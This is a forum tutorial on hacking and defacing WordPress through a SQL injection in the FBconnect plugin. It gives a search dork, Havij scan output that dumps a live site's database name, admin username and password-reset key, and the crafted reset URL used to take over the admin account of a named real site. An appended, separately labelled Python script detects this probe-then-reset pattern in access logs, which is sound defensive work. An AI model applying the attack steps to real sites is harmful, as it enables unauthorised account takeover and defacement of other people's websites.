
Tutorial Hack/Deface Wordpress


Tutorial/How to Hack/Deface WordPress via the FBconnect Vuln

Materials:
Quote:Dork : inurl:"fbconnect_action=myhome" << can be expanded
Tools : Havij
Exploit : Forgot Password
http://site/wp-login.php?action=rp&key=QbiDH7xcZJT3d53XnKmB&login=admin

target:
http://sinjai.linux.or.id/
Quote:http://sinjai.linux.or.id/?fbconnect_act...e&userid=2
change it to:
Quote:http://sinjai.linux.or.id/?fbconnect_act...;add fb
just add "fb" before userid
now we scan it with Havij:
Quote:Analyzing http://sinjai.linux.or.id/?fbconnect_act...fbuserid=2
Host IP: 49.50.8.85
Web Server: Apache
Keyword Found: Facebook
Injection type is Integer
Can't find db server type! But maybe there be some chances! [-o<
Selected Column Count is 12
Valid String Column is 6
DB Server: MySQL
Current DB: h80929_wp2

Scan: "wp-user"
activation key -> QbiDH7xcZJT3d53XnKmB&
username -> admin

then open:
http://sinjai.linux.or.id/wp-login.php
click forgot password
or append <> ?action=lostpassword
Quote:http://sinjai.linux.or.id/wp-login.php?a...stpassword
enter admin << as the username found in the wp-user table that was scanned with Havij...

so with the forgot password exploit
http://site/wp-login.php?action=rp&key=QbiDH7xcZJT3d53XnKmB&login=admin
we build it out...
Quote:http://sinjai.linux.or.id/wp-login.php?a...ogin=admin

and enter our new password..
and finally log in...
[Image: setelahdireset.jpg]
http://sinjai.linux.or.id/wp-login.php
username : admin
password : whatever it was reset to
[Image: linux.or.id.jpg]
Hope this is useful and helps
please forgive any shortcomings
if my thread is unimportant, a repost, etc..
just close it, I don't mind.
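
From the defending side, the sequence in this post leaves a recognisable trail in the web server access log: a non-integer value in the fbconnect id parameter, followed by a wp-login.php?action=rp request from the same client. The Python below is an added detection example, not part of the original post; the log lines, client IPs and key values are constructed, and the function name scan is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IPs, placeholder reset keys).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2012:10:00:01 +0000] "GET /?fbconnect_action=myhome&userid=2 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Mar/2012:10:02:11 +0000] "GET /?fbconnect_action=myhome&fbuserid=2%27 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Mar/2012:10:05:40 +0000] "GET /wp-login.php?action=lostpassword HTTP/1.1" 200 2048
203.0.113.9 - - [10/Mar/2012:10:06:02 +0000] "GET /wp-login.php?action=rp&key=CONSTRUCTEDKEY&login=admin HTTP/1.1" 200 2300
198.51.100.7 - - [10/Mar/2012:10:09:00 +0000] "GET /wp-login.php?action=rp&key=CONSTRUCTEDKEY2&login=editor HTTP/1.1" 200 2300
"""

# client IP, request target and status from a common/combined log line
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')
INTEGER = re.compile(r"[0-9]+")
ID_PARAMS = ("fbuserid", "userid")  # id parameters named in the post


def scan(log_text):
    """Return (client_ip, finding) tuples in log order."""
    probed = set()  # clients that sent a non-integer fbconnect id
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not request records
        ip, target, _status = m.groups()
        url = urlsplit(target)
        query = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        if "fbconnect_action" in query:
            for name in ID_PARAMS:
                for value in query.get(name, []):
                    # The id is meant to be an integer; anything else is suspect.
                    if not INTEGER.fullmatch(value):
                        probed.add(ip)
                        alerts.append((ip, "non-integer " + name))
        elif url.path.endswith("/wp-login.php") and query.get("action") == ["rp"]:
            # A reset link on its own is normal; after a probe it is not.
            if ip in probed:
                login = query.get("login", [""])[0]
                alerts.append((ip, "reset link used after probe, login=" + login))
    return alerts


if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

Correlating on client IP alone misses a client that changes address between the two steps, so treat any non-integer id finding as worth investigating by itself.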
